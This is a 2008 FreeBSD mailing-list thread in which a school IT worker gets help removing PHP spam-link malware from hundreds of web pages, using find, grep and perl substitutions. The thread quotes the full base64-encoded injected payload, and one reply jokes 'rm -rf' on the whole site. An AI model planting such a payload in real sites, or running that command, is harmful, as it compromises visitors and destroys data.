RE: Mass find/replace...
Arse - I spoke too soon. Anyone know any perl to remove blank lines???! i don't know perl but grep -v ^$ will remove all empty lines ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
On Friday 05 December 2008 11:19:09 Marc Coyles wrote: > > All done n' dusted now - thanks very much for everyone's input...! > > Have noted everything down in the back of my copy of "Absolute > > FreeBSD 2nd Edition" (which has inherited quite a few additional > > pages since I bought it). > > > > Now that that's done, I can start to wander thru logs and find > > who/how... > > > > Cheers! > > Marc > > Arse - I spoke too soon. > > Anyone know any perl to remove blank lines???! > It's left a blank line at top of each PHP file that it performed the action > on, which has broken things a touch... 's/^(.*?)\r?\n\r?\n/$1\n/s' should only replace the first empty line it finds in a file and accounts for windows line endings. Try it out on one file first: perl -pi.bak 's/^(.*?)\r?\n\r?\n/$1\n/s' filename.php -- Mel Problem with today's modular software: they start with the modules and never get to the software part. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
RE: Mass find/replace...
> All done n' dusted now - thanks very much for everyone's input...! > Have noted everything down in the back of my copy of "Absolute > FreeBSD 2nd Edition" (which has inherited quite a few additional > pages since I bought it). > > Now that that's done, I can start to wander thru logs and find > who/how... > > Cheers! > Marc > Arse - I spoke too soon. Anyone know any perl to remove blank lines???! It's left a blank line at top of each PHP file that it performed the action on, which has broken things a touch... marc ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
RE: Mass find/replace...
All done n' dusted now - thanks very much for everyone's input...! Have noted everything down in the back of my copy of "Absolute FreeBSD 2nd Edition" (which has inherited quite a few additional pages since I bought it). Now that that's done, I can start to wander thru logs and find who/how... Cheers! Marc ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 Peter Boosten wrote: | Marc Coyles wrote: |> I'm presuming it'd be: |> |> Find /home/horbury -type f -name "*.bak" -exec \ |> Rm *.bak |> | | find /home/horbury -name "*.bak" -exec rm {} \; | find /home/horbury -type f -name '*.bak' -delete 'delete' is a find primitive -- no need to exec any other processes. Cheers, Matthew - -- Dr Matthew J Seaman MA, D.Phil. Flat 3 ~ 7 Priory Courtyard PGP: http://www.infracaninophile.co.uk/pgpkey Ramsgate ~ Kent, CT11 9PW, UK -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.9 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEAREDAAYFAkk4+OAACgkQ3jDkPpsZ+VbPwACfUrggUN1yIPqkq3pgCyy6fFzH sncAn2WW0XD9l9NgNtK4T2IiMqoyxY6f =1CX6 -END PGP SIGNATURE- ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
On Friday 05 December 2008 10:17:46 Marc Coyles wrote: > > + not \; or you will fork on every result. > > > > Additionally, is this injected code one long string or broken down > > by the > > mailer? Grep isn't the best way to deal with it. It's pretty easy > > to correct > > with perl, bit trickier if it's multiline, still not too hard: > > > > find /home/horbury -type f -exec \ > > perl -pi.bak -e 's,<\? /\*\*/eval\(base64_decode\(.*?\?>,,s' {} + > > Sadly that didn't work. It created .bak files for everything within > /home/Horbury recursively, but didn't make any changes - the base64_decode > is till present. > > Additional point to note: this only needs performing on .php files, not all > files... > > Would I be correct in guessing it's because the string for perl to search > for omits a space? Nope. > IE: within the files, it's as follows: > Cause in your original mail I didn't catch the ,,s' > Whereas the perl appears to be looking for: > > > Also... how to delete all files ending in .bak recursively? *grin* > > I'm presuming it'd be: > > Find /home/horbury -type f -name "*.bak" -exec \ find /home/horbury -name '*.bak' -delete -- Mel Problem with today's modular software: they start with the modules and never get to the software part. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
Marc Coyles wrote: > > I'm presuming it'd be: > > Find /home/horbury -type f -name "*.bak" -exec \ > Rm *.bak > find /home/horbury -name "*.bak" -exec rm {} \; Peter -- http://www.boosten.org ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
RE: Mass find/replace...
> + not \; or you will fork on every result. > > Additionally, is this injected code one long string or broken down > by the > mailer? Grep isn't the best way to deal with it. It's pretty easy > to correct > with perl, bit trickier if it's multiline, still not too hard: > > find /home/horbury -type f -exec \ > perl -pi.bak -e 's,<\? /\*\*/eval\(base64_decode\(.*?\?>,,s' {} + > Sadly that didn't work. It created .bak files for everything within /home/Horbury recursively, but didn't make any changes - the base64_decode is till present. Additional point to note: this only needs performing on .php files, not all files... Would I be correct in guessing it's because the string for perl to search for omits a space? IE: within the files, it's as follows: Whereas the perl appears to be looking for: Also... how to delete all files ending in .bak recursively? *grin* I'm presuming it'd be: Find /home/horbury -type f -name "*.bak" -exec \ Rm *.bak ??? Ta! Marc ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
RE: Mass find/replace...
> + not \; or you will fork on every result. > > Additionally, is this injected code one long string or broken down > by the > mailer? Grep isn't the best way to deal with it. It's pretty easy > to correct > with perl, bit trickier if it's multiline, still not too hard: > > find /home/horbury -type f -exec \ > perl -pi.bak -e 's,<\?/\*\*/eval\(base64_decode\(.*?\?>,,s' > {} + > Hi Mel... S'One long singleline string broken down by the mailer... Have tried doing a find and replace using perl, initially just to replace the string, leaving an empty base64_decode(), however, one of the ICT Teachers has created paths with spaces in, which seemed to throw off the perl I was using... will give yours a try later today *fingers crossed*... If worst comes to worst I can restore from backups, it'll just mean students lose a few days of work that they'd submitted thru Moodle (I've been off for a day or three, and this appears to have happened on the first day of my absence) Ta fer the helpful suggestions thus far! Marc A Coyles - Horbury School ICT Support Team Mbl: 07850 518106 Land: 01924 282740 ext 730 Helpdesk: 01924 282740 ext 2000 ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
On Thursday 04 December 2008 13:58:20 Julien Cigar wrote: > the following should work : > $ find /home/horbury -type f -print0 | xargs -0 grep 'base64_decode' > or : > $ find /home/horbury -type f -exec grep 'base64_decode' {} \; + not \; or you will fork on every result. Additionally, is this injected code one long string or broken down by the mailer? Grep isn't the best way to deal with it. It's pretty easy to correct with perl, bit trickier if it's multiline, still not too hard: find /home/horbury -type f -exec \ perl -pi.bak -e 's,<\?/\*\*/eval\(base64_decode\(.*?\?>,,s' {} + The originals will end up as filename.php.bak. -- Mel Problem with today's modular software: they start with the modules and never get to the software part. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
Or just: grep -r base64_decode /home/Horbury rm -rf /home/Horbury and then - write the webpage code properly :) ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
On Thu, Dec 04, 2008 at 12:52:02PM +, Vincent Hoffman typed: > Marc Coyles wrote: > > > > I need to do a find / replace throughout the entire of the > > /home/horbury/public_html directory... > > I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode' > > to get a list of the files that require the operation performing, but it > > comes up with an error (xargs: unterminated quote) after a few > > results... > > > try using > > find /home/Horbury/ -type f -print0| xargs -0 grep -l base64_decode > (not certain it'll fix it but good practice anyway) Or just: grep -r base64_decode /home/Horbury Ruben ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
the following should work : $ find /home/horbury -type f -print0 | xargs -0 grep 'base64_decode' or : $ find /home/horbury -type f -exec grep 'base64_decode' {} \; On Thu, 2008-12-04 at 12:14 +, Marc Coyles wrote: > Never had to do this so not sure where to start. Have googled and found > some solutions but they don't particularly work (see below)... > > Someone has managed to inject php code into a PILE of php pages on my > webserver... > > " /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz > ZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhp > c3RzKCcvaG9tZS9ob3JidXJ5L3B1YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRv > ci9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMv > aWNvbnMvMzIvbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9ob3JidXJ5L3B1 > YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRvci9mY2tlZGl0b3IvZWRpdG9yL2Zp > bGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvbWRsX3V0Zi5waHAn > KTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp > KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgk > UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdB > MzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYw > NjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRS > MEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMw > ODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5 > MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2 > OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZE > QTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4 > ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2 > QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4 > NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy > ODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigk > UjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdB > N0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2 > NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31p > ZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdC > N0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFF > MzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy > ODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUz > MTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNF > MDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0 > dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29i > aCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQt > RW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6 > ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0 > Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXty > ZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwk > UjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCku > JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcp > O319fQ==')); ?>" > > This basically brings up a pile of spam links. > > I need to do a find / replace throughout the entire of the > /home/horbury/public_html directory... > I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode' > to get a list of the files that require the operation performing, but it > comes up with an error (xargs: unterminated quote) after a few > results... > > Any tips? Basically to find the above and remove it... otherwise I'll > have to resort to doing it in Dreamweaver and reuploading, which is a > major pita, or restoring from a backup (after working out when exactly > this happened and how - I'm guessing thru a teacher's out of date > wordpress install somewhere). > > Marc A Coyles - Horbury School ICT Support Team > Mbl: 07850 518106 > Land: 01924 282740 ext 730 > Helpdesk: 01924 282740 ext 2000 > > > > > ___ > freebsd-questions@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-questions > To unsubscribe, send any mail to "[EMAIL PROTECTED]" -- Julien Cigar Belgian Biodiversity Platform http://www.biodiversity.be Université Libre de Bruxelles (ULB) Campus de la Plaine CP 257 Bâtiment NO, Bureau 4 N4 115C (Niveau 4) Boulevard du Triomphe, entrée ULB 2 B-1050 Bruxelles Mail: [EMAIL PROTECTED] @biobel: http://biobel.biodiversity.be/person/show/471 Tel : 02 650 57 52 ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
Marc Coyles wrote: > Never had to do this so not sure where to start. Have googled and found > some solutions but they don't particularly work (see below)... > > Someone has managed to inject php code into a PILE of php pages on my > webserver... > > " /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz > ZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhp > c3RzKCcvaG9tZS9ob3JidXJ5L3B1YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRv > ci9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMv > aWNvbnMvMzIvbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9ob3JidXJ5L3B1 > YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRvci9mY2tlZGl0b3IvZWRpdG9yL2Zp > bGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvbWRsX3V0Zi5waHAn > KTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp > KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgk > UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdB > MzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYw > NjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRS > MEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMw > ODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5 > MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2 > OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZE > QTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4 > ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2 > QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4 > NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy > ODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigk > UjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdB > N0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2 > NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31p > ZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdC > N0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFF > MzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy > ODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUz > MTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNF > MDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0 > dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29i > aCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQt > RW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6 > ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0 > Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXty > ZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwk > UjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCku > JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcp > O319fQ==')); ?>" > > This basically brings up a pile of spam links. > > I need to do a find / replace throughout the entire of the > /home/horbury/public_html directory... > I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode' > to get a list of the files that require the operation performing, but it > comes up with an error (xargs: unterminated quote) after a few > results... > try using find /home/Horbury/ -type f -print0| xargs -0 grep -l base64_decode (not certain it'll fix it but good practice anyway) Vince > Any tips? Basically to find the above and remove it... otherwise I'll > have to resort to doing it in Dreamweaver and reuploading, which is a > major pita, or restoring from a backup (after working out when exactly > this happened and how - I'm guessing thru a teacher's out of date > wordpress install somewhere). > > Marc A Coyles - Horbury School ICT Support Team > Mbl: 07850 518106 > Land: 01924 282740 ext 730 > Helpdesk: 01924 282740 ext 2000 > > > > > ___ > freebsd-questions@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-questions > To unsubscribe, send any mail to "[EMAIL PROTECTED]" > ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Mass find/replace...
Never had to do this so not sure where to start. Have googled and found some solutions but they don't particularly work (see below)... Someone has managed to inject php code into a PILE of php pages on my webserver... "" This basically brings up a pile of spam links. I need to do a find / replace throughout the entire of the /home/horbury/public_html directory... I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode' to get a list of the files that require the operation performing, but it comes up with an error (xargs: unterminated quote) after a few results... Any tips? Basically to find the above and remove it... otherwise I'll have to resort to doing it in Dreamweaver and reuploading, which is a major pita, or restoring from a backup (after working out when exactly this happened and how - I'm guessing thru a teacher's out of date wordpress install somewhere). Marc A Coyles - Horbury School ICT Support Team Mbl: 07850 518106 Land: 01924 282740 ext 730 Helpdesk: 01924 282740 ext 2000 ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"